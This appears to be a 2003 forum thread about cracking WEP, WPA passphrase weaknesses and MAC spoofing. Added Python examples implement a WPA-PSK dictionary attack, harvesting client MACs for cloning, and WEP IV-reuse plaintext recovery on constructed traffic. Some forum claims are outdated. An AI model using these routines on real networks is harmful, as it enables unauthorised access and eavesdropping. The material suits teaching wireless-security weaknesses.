skyfreedomdo Premium join:2003-01-01 Boise, ID | How long would it take to break WEP 64 bit and 128 bit? Any ideas or *shhh* experiences? |
|
bmn ? ? ? Premium,ExMod 2003-06 join:2001-03-15 hiatus | said by skyfreedomdo : ... break WEP 64 bit and 128 bit?
An hour or two on a REALLY busy network, several hours on a not-so-busy network, and probably several days on one not used all that often. You have to capture a couple thousand to a million-plus packets for some software.
As for this program, it didn't say whether or not you needed to get the WEP keys first or if the software does it for you by capturing and analyzing the packets. Of course, that is assuming that your local WiFi-providing cafe actually has WEP turned on, and from casual war driving, many don't. -- Male by birth... Geek by choice. -- Man... Earth's most foolish child. |
|
skyfreedomdo Premium join:2003-01-01 Boise, ID | Good point on WEP not being used by many. How about TKIP (Temporal Key Integrity Protocol)? Has anyone read about or applied it? -- SKYFREEDOM NETWORKS Whatever the angle; We've got you covered. |
|
DSLDUDE Got The Folding Farm Itch Premium join:2002-01-07 Norcross, GA | reply to bmn I like my MAC filtering. I've tried everything to get past that, and you just can't get in. WEP, MAC, and common sense will prevail over all... -- »www.fnort.com |
|
skyfreedomdo Premium join:2003-01-01 Boise, ID | I like MAC filtering, but there's always a chance of MAC SPOOFING! But you are right: common sense and, if I might add, knowledge of the enemy out there or within will prevail. -- SKYFREEDOM NETWORKS Whatever the angle; We've got you covered. |
|
bmn ? ? ? Premium,ExMod 2003-06 join:2001-03-15 hiatus | reply to DSLDUDE It's already been stated, but MAC spoofing will defeat MAC filtering. Most wireless cards have the ability to change the MAC address that is used by the card. I'd post a screenshot of how it can be done (it's very easy), but the laptop is packed up in the car. -- Male by birth... Geek by choice. -- Man... Earth's most foolish child. |
|
DenverDialup join:2003-06-06 Littleton, CO | reply to DSLDUDE Well, consider too that WPA is becoming the new standard in wireless security. I don't see why Shmoo has to go write another hacking/phreaking/wardriving tool to "prove an inherent insecurity in 802.11b"... anyone who's spent more than a day looking at wireless technologies today knows how insecure it is. Why not take that effort and translate it into something more useful -- like actually working to make WiFi more secure? -- "Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the Universe trying to produce bigger and better idiots. So far, the Universe is winning." -- Rich Cook |
|
bmn ? ? ? Premium,ExMod 2003-06 join:2001-03-15 hiatus | said by DenverDialup : Well, consider too that WPA is becoming the new standard in wireless security.
An article came out not long ago that stated that WPA is not much more secure than WEP and can still be broken. -- Male by birth... Geek by choice. -- Man... Earth's most foolish child. |
|
  BeesTea Network Janitor Premium,VIP join:2003-03-08 00000
| reply to bmn Sure, changing your MAC is not hard. That isn't spoofing and it isn't "defeating" anything at all. You're literally becoming a device allowed to connect to the WAP. Now here's the interesting part. Can you explain the process of knowing what to set your MAC to in order to gain access to the WAP?
On the issue of WEP, it isn't intended to provide strong cryptographic communication. WEP means "Wired Equivalent Privacy". That is, just as a wire holds the signal, keeping it from being intercepted easily, WEP keeps signal from being eavesdropped on easily.
This is another example of why the physical layer is NOT where security is applied for the average network. Wireless or otherwise.
Cheers, -BeesT -- 2b2b2b415448300d |
|
shmoe1 join:2003-09-06 Fremont, CA
| reply to bmn One article about WPA vulnerability I've encountered was by Robert Moskowitz, senior technical director at ICSA Labs.
It details problems with pre-shared keys of fewer than 20 characters built from simple passphrases, which were vulnerable to a dictionary attack. Complex passphrases longer than 20 characters seem to be less of a security issue.
I also read that WPA is just as vulnerable as WEP to denial-of-service attacks.
If others can point to other articles or specific problems it would be useful.
Thanx |
|
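To make the passphrase-length point above concrete, here is an added example (mine, not from the thread or from the Moskowitz article) of the WPA-PSK derivation the dictionary attack targets: the pairwise master key is PBKDF2-HMAC-SHA1 over the passphrase, salted with the SSID, 4096 iterations, 32 bytes. The attacker pays one such derivation per guess, which is why a dictionary word falls quickly while a long random passphrase does not. The target network, the wordlist and the `dictionary_attack` helper are constructed for illustration; a real attack checks each candidate PMK against a captured 4-way handshake rather than against a known PMK, but the per-guess cost is identical.

```python
"""Added example, not from the thread: WPA-PSK passphrase derivation and the
cost model behind the 'use 20+ characters' advice."""
import hashlib
import time


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def dictionary_attack(target_pmk: bytes, ssid: str, wordlist):
    """Offline guessing: one PBKDF2 run per candidate, nothing is sent to the AP.
    (Assumption for the demo: we compare against a known PMK; a real attacker
    compares against the MIC of a captured 4-way handshake instead.)
    Returns (passphrase, guesses_spent) or (None, guesses_spent)."""
    for i, word in enumerate(wordlist, 1):
        if derive_pmk(word, ssid) == target_pmk:
            return word, i
    return None, len(wordlist)


def guesses_per_second(ssid: str = "bench", samples: int = 20) -> float:
    """Rough single-core PBKDF2 rate on this machine."""
    start = time.perf_counter()
    for i in range(samples):
        derive_pmk(f"probe{i}", ssid)
    return samples / (time.perf_counter() - start)


def seconds_to_exhaust(alphabet_size: int, length: int, rate: float) -> float:
    """Worst case for a random passphrase drawn from alphabet_size symbols."""
    return (alphabet_size ** length) / rate


if __name__ == "__main__":
    # Constructed target network: SSID 'linksys', passphrase 'letmein'.
    ssid = "linksys"
    target = derive_pmk("letmein", ssid)
    wordlist = ["password", "123456", "letmein", "qwerty"]   # constructed wordlist
    found, tries = dictionary_attack(target, ssid, wordlist)
    print(f"recovered {found!r} after {tries} guesses")

    rate = guesses_per_second()
    print(f"~{rate:.0f} PBKDF2 guesses/s on this core")
    for length in (8, 20):
        secs = seconds_to_exhaust(26, length, rate)
        print(f"{length} lowercase letters: {secs / 86400:.3g} days worst case")
```

The IEEE 802.11i test vector (passphrase `password`, SSID `IEEE`) is a handy sanity check for `derive_pmk`; the benchmark numbers are hardware-dependent and only meant to show the ratio between 8 and 20 characters.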
bmn ? ? ? Premium,ExMod 2003-06 join:2001-03-15 hiatus | reply to BeesTea said by BeesTea : Can you explain the process of knowing what to set your MAC to in order to gain access to the WAP?
It would involve sniffing traffic on that WLAN. You would then be able to detect the MAC address of a system associated with the WLAN that is your target. I haven't actually done it (over the black hat stuff), so the mechanics of doing it are not 100% in my skillset, but the conceptual process can be found elsewhere.
quote: That is, just as a wire holds the signal, keeping it from being intercepted easily, WEP keeps signal from being eavesdropped on easily.
That was its intended purpose, but some rely on it solely for access and information protection. I always grin when people fire up something like telnet and login via a wireless connection. Of course without WEP, a network is just waiting to be had. -- Male by birth... Geek by choice. -- Man... Earth's most foolish child. |
|
NotAHacker @dbma.com
| How hard is it to spoof a MAC address? Well, if you have the software and knowledge to determine WEP keys, you already have everything you need to also learn all the authorized MAC addresses on that WLAN.
I'm not going into further detail, even though the info is widely available on the Internet. |
|
sporkme drop the crantini and move it, sister Premium,MVM join:2000-07-01 Budd Lake, NJ | reply to BeesTea said by BeesTea : Now here's the interesting part. Can you explain the process of knowing what to set your MAC to in order to gain access to the WAP?
Just run your favorite sniffer for a while. The frame headers are NOT encrypted when WEP is enabled. So it's actually pretty easy. I've been toying with "KisMac" and it's pretty simple. It's totally point-n-drool. Right-click on a node and there's a menu item "Find Key". With a moderate amount of traffic this happens in less than a half hour.
WEP is fundamentally broken. I don't mind the idea of encrypting at L2, but they chose a very weak algorithm. -- just a minute |
|
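An added example (mine, not KisMac's code and not from anyone in the thread) of what a sniffer gets for free from a WEP-protected 802.11 data frame, covering both points argued above: the addresses that MAC filtering trusts are in the unencrypted header, and the 3-byte IV in front of the RC4-encrypted body is sent in the clear, so two frames under one IV share a keystream and leak each other's plaintext. Frames, MAC addresses and the 40-bit key are constructed locally; the weak-IV key recovery that "Find Key" performs is not implemented here.

```python
"""Added example, not from the thread: parse 802.11 data frames to show what is
readable without the WEP key.  All frames below are constructed in memory."""
import struct
import zlib

FC_TO_DS, FC_FROM_DS, FC_PROTECTED = 0x01, 0x02, 0x40   # flag bits, 2nd FC byte
BROADCAST = "ff:ff:ff:ff:ff:ff"


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4; WEP seeds it with IV || shared key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def mac(s: str) -> bytes:
    return bytes.fromhex(s.replace(":", ""))


def fmt_mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def build_wep_frame(src, dst, bssid, iv, key, payload, to_ds=True):
    """Data frame with the Protected bit set.  ToDS: addr1=BSSID, addr2=SA,
    addr3=DA.  FromDS: addr1=DA, addr2=BSSID, addr3=SA."""
    flags = FC_PROTECTED | (FC_TO_DS if to_ds else FC_FROM_DS)
    a1, a2, a3 = (bssid, src, dst) if to_ds else (dst, bssid, src)
    hdr = bytes([0x08, flags]) + b"\x00\x00" + a1 + a2 + a3 + b"\x00\x00"
    icv = struct.pack("<I", zlib.crc32(payload))            # WEP integrity value
    return hdr + iv + b"\x00" + rc4(iv + key, payload + icv)  # key index 0


def parse_frame(frame: bytes) -> dict:
    """Everything returned here is visible to any card in monitor mode."""
    flags = frame[1]
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    if flags & FC_TO_DS and not flags & FC_FROM_DS:
        bssid, sa, da = a1, a2, a3
    elif flags & FC_FROM_DS and not flags & FC_TO_DS:
        da, bssid, sa = a1, a2, a3
    else:                                   # ad hoc / no-DS
        da, sa, bssid = a1, a2, a3
    info = {"bssid": fmt_mac(bssid), "sa": fmt_mac(sa), "da": fmt_mac(da),
            "wep": bool(flags & FC_PROTECTED)}
    if info["wep"]:
        info["iv"], info["key_idx"], info["body"] = frame[24:27], frame[27] >> 6, frame[28:]
    return info


def associated_clients(frames, bssid: str) -> set:
    """MACs seen talking through the AP: the values an attacker would clone."""
    seen = set()
    for f in frames:
        p = parse_frame(f)
        if p["bssid"] == bssid:
            seen.update(m for m in (p["sa"], p["da"]) if m not in (bssid, BROADCAST))
    return seen


def iv_reuse_leak(frames, known_plaintext: bytes):
    """Same IV => same RC4 keystream => c1 ^ c2 == p1 ^ p2.  With p1 known,
    p2 is recovered without the key.  Returns (iv, recovered_bytes) or None."""
    by_iv = {}
    for f in frames:
        p = parse_frame(f)
        if p["wep"]:
            by_iv.setdefault(p["iv"], []).append(p["body"])
    for iv, bodies in by_iv.items():
        if len(bodies) >= 2:
            c1, c2 = bodies[0], bodies[1]
            n = min(len(c1), len(c2), len(known_plaintext))
            return iv, bytes(c1[i] ^ c2[i] ^ known_plaintext[i] for i in range(n))
    return None


# Constructed sample traffic: one AP, two clients, 40-bit WEP key.
KEY = bytes.fromhex("0102030405")
AP, LAPTOP, PRINTER = mac("00:0c:41:aa:bb:cc"), mac("00:0e:35:11:22:33"), mac("00:90:4b:44:55:66")
FRAMES = [
    build_wep_frame(LAPTOP, AP, AP, b"\x01\x02\x03", KEY, b"GET /index.html HTTP/1.0\r\n"),
    build_wep_frame(PRINTER, AP, AP, b"\x01\x02\x03", KEY, b"Password: hunter2 for printer"),
    build_wep_frame(PRINTER, LAPTOP, AP, b"\x07\x08\x09", KEY, b"queued job 17", to_ds=False),
]

if __name__ == "__main__":
    print("clients to clone:", sorted(associated_clients(FRAMES, fmt_mac(AP))))
    print("IV reuse leak:", iv_reuse_leak(FRAMES, b"GET /index.html HTTP/1.0\r\n"))
```

With a 24-bit IV space and the IV chosen by the sending card, repeats on a busy network are a matter of hours, which is the traffic-dependent timing bmn describes above; the full key recovery that KisMac automates builds on the same cleartext IVs.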
aitech Guru. Kneel join:2000-12-19 Boston, MA | Has anyone gotten a successful port of Kismet into Windows yet, or is it still alpha?
And anyone have any idea when netstumbler .4 is coming yet? |
|
  BeesTea Network Janitor Premium,VIP join:2003-03-08 00000
edit: November 26th, @08:10PM
| reply to bmn said by bmn :
It would involve sniffing traffic on that WLAN. You would then be able to detect the MAC address of a system associated with the WLAN that is your target. I haven't actually done it (over the black hat stuff), so the mechanics of doing it are not 100% in my skillset, but the conceptual process can be found elsewhere.
That's an interesting concept. It was my understanding that by frequency variation the clients were not able to see one another, hence the need for a WAP. Does this require the NIC to be in ad hoc mode? I wish I had more than just my laptop running on 802.11 here to play with.
I've been looking for a bit this evening and can't find any method that doesn't require using crazy radio frequency tools. There are some funky white papers on parsing radio streams in the unlicensed frequency ranges but they seem to be more "find the person snooping your cordless phone" type stuff.
If you happen to find anything on this please let me know, as that's not at all how I understood it to operate.
Cheers, -BeesT
OK, I've scoured the Seattle wireless mailing list archive and it seems my understanding of how this works is based on modern 802.11 card implementations. Newer cards apparently make it non-trivial to intercept packets on the way to the WAP or vice versa. Presumably older cards with new firmware would also reduce this risk. -- 2b2b2b415448300d |
|